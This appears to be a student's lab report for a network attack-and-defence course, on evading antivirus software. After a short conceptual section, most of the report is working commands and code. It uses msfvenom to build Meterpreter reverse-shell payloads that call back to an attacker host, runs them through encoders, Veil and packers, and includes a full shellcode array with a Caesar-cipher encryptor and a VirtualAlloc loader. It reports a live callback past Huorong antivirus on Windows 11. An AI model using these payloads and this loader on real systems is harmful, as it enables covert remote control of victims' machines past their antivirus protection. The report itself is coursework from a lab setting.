20222306 2024-2025-1《网络与系统攻防技术》实验三实验报告

1.实验内容

1.1 实践任务

(1)正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧

(2)通过组合应用各种技术实现恶意代码免杀

(3)用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

1.2 问题回答

（1）杀软是如何检测出恶意代码的？

杀软检测恶意代码主要有三种方式：基于特征码的检测、启发式恶意软件检测、基于行为的恶意软件检测。

①当杀软对一个新的程序或文件进行检测时，会将其代码与病毒库中的特征码进行比对，如果发现匹配的特征码，就判定该程序或文件为恶意代码。

②启发式恶意软件检测是根据软件的行为（典型的行为如连接恶意网站、开放端口、修改系统文件）推测其是否为恶意软件。

③基于行为的恶意软件检测是后来提出的，可以理解为加入了行为监控的启发式恶意软件检测。

（2）免杀是做什么？

免杀是指通过各种技术手段避免恶意软件被杀毒软件检测到的行为。这通常涉及到对恶意软件代码的修改，使其能够绕过安全软件的检测机制，从而在未被发现的情况下在目标系统上执行。

（3）免杀的基本方法有哪些？

① 静态免杀方法

代码混淆：通过修改恶意软件的代码，使其难以被反病毒软件理解。例如，使用代码混淆技术，将恶意代码的结构、逻辑或数据进行变换，以增加反病毒软件分析的难度。

特征码修改：恶意软件通常会被杀毒软件通过特征码识别。通过修改恶意软件的特征码，可以使其避开杀毒软件的检测。这通常涉及到对恶意软件的二进制文件进行微小的修改。

加壳与加密：对恶意软件进行加壳处理，即将恶意软件的可执行文件压缩打包，并与解压缩代码组合成单个可执行文件。在运行时，解压缩代码会重新创建原始代码并执行。同时，对恶意软件的二进制文件进行加密处理，以防止其被逆向分析。

② 动态免杀方法
内存注入：将恶意代码注入到其他正在运行的进程中，利用这些进程来执行恶意操作。这种方法可以绕过杀毒软件对恶意软件的直接检测。

行为模拟：恶意软件在运行时，会模拟正常软件的行为，以避免触发杀毒软件的行为监控机制。

沙箱检测：恶意软件会检测自身是否处于沙箱环境中（一种用于分析恶意软件行为的隔离环境）。如果检测到处于沙箱环境，则不执行恶意操作，以避免被杀毒软件捕获。

③ 其他免杀方法
条件编译：根据编译时的条件，选择性地编译恶意软件的某些部分。例如，只有在满足特定条件时，才编译恶意代码的部分功能。

利用系统漏洞：利用操作系统或应用程序的漏洞，绕过安全检测机制。这种方法需要恶意软件开发者对系统漏洞有深入的了解。

合法文件利用：将恶意代码嵌入到合法的文件中，如图片、文档等，利用这些文件的合法性来绕过杀毒软件的检测。

⑤内存免杀，在内存中继续重复上面的步骤，使恶意软件在内存中不被杀掉。

2.实验过程

（说明：由于实验环境的改变，虚拟机地址由192.168.80.136变成192.168.80.139,前后一些截图可能在这上面有一点变化）

任务一 正确使用msf编码器，veil-evasion，自己利用shellcode编程等免杀工具或技巧

使用msfvenom生成jar等文件。
查看 msfvenom 支持的所有输出格式：输入msfvenom --list formats；

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.139 LPORT=8888 -f exe > 20222306txm.exe，生成payload；

-p windows/meterpreter/reverse_tcp:指定了要生成的 payload 类型，是一个 Meterpreter 反向 TCP 连接；

LHOST=192.168.80.139设置了连接回的本地 IP 地址，即kali虚拟机的 IP 地址；

LPORT=8888设置了连接回的本地端口号；

-f exe: 这指定了输出格式为 Windows 可执行文件；

查看 msfvenom 支持的所有编码方式：输入msfvenom --list encoders；

使用编码器对payload进行编码，输入msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.80.139 LPORT=8888 -f exe > 20222306txm-2.exe

-e x86/shikata_ga_nai: 这指定了要使用的编码器；

-b ‘\x00’: 这指定了需要避免的坏字符集；

LHOST、LPORT同上；

多次编码：msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b '\x00' LHOST=192.168.80.139 LPORT=8888 -f exe > 20222306txm-3.exe；
-i 10表示编码10次；

选择一个适用于Java环境的payload来生成jar文件：msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.80.139 LPORT=8888 -f jar > 20222306txm-4.jar；

使用编码器对payload进行编码：msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.80.139 LPORT=8888 -e x86/shikata_ga_nai -i 10 -f jar > 20222306txm-5.jar；

生成一个反向 TCP 连接的 Linux elf 可执行文件：msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.139 LPORT=8888 -f elf >20222306txm-6.elf

使用编码器对payload进行编码：msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.139 LPORT=8888 -e x86/shikata_ga_nai -i 10 -f elf > 20222306txm-7.elf

打开VirusTotal的链接https://www.virustotal.com/gui/home/upload，放入文件，使用VirusTotal进行检测；

使用veil工具

安装veil，需要保持虚拟机是联网状态，依次输入以下命令：

mkdir -p ~/.cache/wine

cd ~/.cache/wine

wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi

wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi

sudo apt-get install libncurses5*

sudo apt-get install libavutil55*

sudo apt-get install gcc-mingw-w64*

sudo apt-get install wine32

当输入完sudo apt-get install wine32后报错，此时先输入dpkg --add-architecture i386，再输入sudo apt-get update，然后输入sudo apt-get install wine32即可；

再依次输入：
apt-get install veil ——安装veil
sudo su
cd /usr/share/veil/config/

再输入vim setup.sh

在第200多行的代码中，找到下图内容，按i键进入编辑模式，把下载地址换成https://gitee.com/spears/VeilDependencies.git，按ESC键，输入:wq退出；

运行veil进行安装；

过程中可能需要安装多个程序，一路默认安装即可；

发现报错，输入sudo /usr/share/veil/config/setup.sh --force --silent，继续安装；

完成安装，输入veil；

输入use evasion ，进入Evil—Evasion；

输入list，查看可使用的payload类型；

使用c/meterpretermrev_tcp.py，即7号，所以输入use 7；

先看下虚拟机ip地址

依次输入命令

set LHOST 192.168.80.139

set LPORT 8888

generate

把生成的文件命名为V20222306

对V20222306.exe进行检测

加壳处理来试图实现免杀

　　（1）压缩加壳

　　输入指令upx 20222306txm.exe -o 20222306txm_upx.exe，对后门文件进行压缩加壳，生成文件20222306txm_upx.exe。

将20222306txm_upx.exe上传至VirusTotal检测

（2）加密加壳

　　先输入cp 20222306txm.exe /usr/share/windows-resources/hyperion复制需要加壳的文件；再输入cd /usr/share/windows-resources/hyperion进入文件夹。
输入指令wine hyperion.exe -v 20222306txm.exe 20222306txm_hyperion.exe对文件进行加密加壳

上传至VirusTotal检测

采用C+shellcode来试图实现免杀
输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.80.139 LPORT=8888 -f c来获取一段shellcode编码。

输入vi 20222306_C.c,创建文件并将shellcode加入进去

上传至VirusTotal检测

至此，任务一结束！

任务二 通过组合应用各种技术实现恶意代码免杀

kali虚拟机中通过msfvenom生成Shellcode数组，代码如下msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.80.139 LPORT=8888 -f c；

将buf[]中的内容复制，新建20222306.cpp文件，输入代码，代码功能为将复制内容放入shellcode[]数组中，通过代码将shellcode进行凯撒加密，将密文输入到20222306.txt文件中
代码如下

点击查看代码

#include <stdio.h>
#include<string.h>
void caesarEncrypt(unsigned char *data, size_t length, int shift) {for (size_t i = 0; i < length; i++) {data[i]= (data[i] + shift) & 0xFF;}
}
int main( ) {unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50""\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52""\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x4d\x31\xc9\x48\x0f""\xb7\x4a\x4a\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41""\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x41""\x51\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f""\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0""\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49""\x01\xd0\xe3\x56\x4d\x31\xc9\x48\xff\xc9\x41\x8b\x34\x88""\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1""\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8""\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44""\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41""\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83""\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9""\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00""\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49""\x89\xe5\x49\xbc\x02\x00\x09\x05\xc0\xa8\x01\x77\x41\x54""\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5""\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b""\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31""\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41""\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58""\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5""\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00""\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58""\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00""\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68""\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba""\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31""\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9""\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68""\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f""\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49""\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48""\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2""\xf0\xb5\xa2\x56\xff\xd5";int shift =3;printf("original: ");for (size_t i = 0; i < 510; i++) {printf("\\x%02x",shellcode[i]);}printf("\n");caesarEncrypt(shellcode,510,shift); printf("Encrypted:");for (size_t i =0;i< 510; i++){printf("\\x%02x",shellcode[i]); }printf("\n");FILE *file = fopen("20222309.txt", "w");if (file != NULL) {for (size_t i = 0; i < 510; i++) {fprintf(file, "\\x%02x", shellcode[i]);}fprintf(file, "\n");fclose(file);} else {printf("Error opening file!\n");}return 0;
}

新建20222306-2.cpp文件，输入代码，代码功能为读取20222306.txt文件中的内容到shellcode[]数组中，并进行解密，再运行shellcode；

代码如下：

点击查看代码

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void caesarDecrypt(unsigned char *data, size_t length, int shift) {for (size_t i = 0; i < length; i++) {data[i] = (unsigned char)((data[i] - shift + 256) % 256);}
}int main() {int shift = 3; unsigned char shellcode1[511]; char line[1024]; FILE *file = fopen("20222309.txt", "r");if (file == NULL) {perror("Error opening file");return 1;}size_t length = 0;while (fgets(line, sizeof(line), file)) {for (size_t i = 0; line[i] != '\0' && line[i] != '\n'; i += 1) {if (sscanf(&line[i], "\\x%02hhx", &shellcode1[length]) == 1) {length++;}}}fclose(file);caesarDecrypt(shellcode1, length, shift);LPVOID exec = VirtualAlloc(0, sizeof shellcode1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);memcpy(exec, shellcode1, sizeof shellcode1);((void(*)())exec)();return 0;
}

将两个exe文件放在桌面且运行发现可以与杀软共生，但是在运行时依旧会跳出提示存在安全危险是否信任，成功免杀的原因是因为使用了代码混淆和加密技术导致杀软无法识别。

至此，任务二完成！

任务三 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本

电脑环境：Windows11 x64

杀毒引擎：火绒

输入msfconsole打开控制台

依次输入命令

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.80.139

set LPORT 8888

run

主机运行后门程序，输入命令ls

会连成功！至此，任务三结束！

3.问题及解决方案

• 问题1：安装veil的时候安装失败，查看原因报空间不足。
• 问题1解决方案：查询网络，用apt-get autoclen,apt-get clean,apt-get autoremove,清理内存后可正常下载，我采用了重装虚拟机同样ok.
• 问题2：出现报错[!] ERROR #2-3: Can't find the wINE profile for AuotIT v3 (/var/lib/vei/wine//drive_c/program Files/AutoIt3/Aut2Exe/Aut2exe.exe).
• 问题2解决方案：输入sudo /usr/share/veil/config/setup.sh --force --silent
• 问题3：杀软开启回连的时候发现无法连接
• 问题3解决方案：重新查询ip后发现ip地址发生改变,由于实验环境的变化地址也在变。

4.学习感悟、思考等

本次实验做的还是很艰难的，有两座大山：Veil安装、免杀技术实现。花费的时间长，还不知道错在哪。后来发现是虚拟机内存空间不够，也是挺无语的。实验中，我接触了一些免杀工具，也学习了msf编码、veil免杀、加壳等一系列的免杀方法。总体上来说，本次实验的内容还是很有意思的。免杀技术作为恶意软件逃避检测的手段，让我深刻认识到了网络安全攻防之间的不断博弈。一方面，杀毒软件不断升级和改进检测技术，以应对日益复杂的恶意代码威胁；另一方面，恶意软件开发者也在绞尽脑汁地寻找新的方法来绕过这些检测。通过对免杀原理与实践的学习，我深刻认识到网络安全是一个动态的、不断变化的领域。我们需要不断地学习和掌握新的安全技术，提高自己的安全意识和防护能力。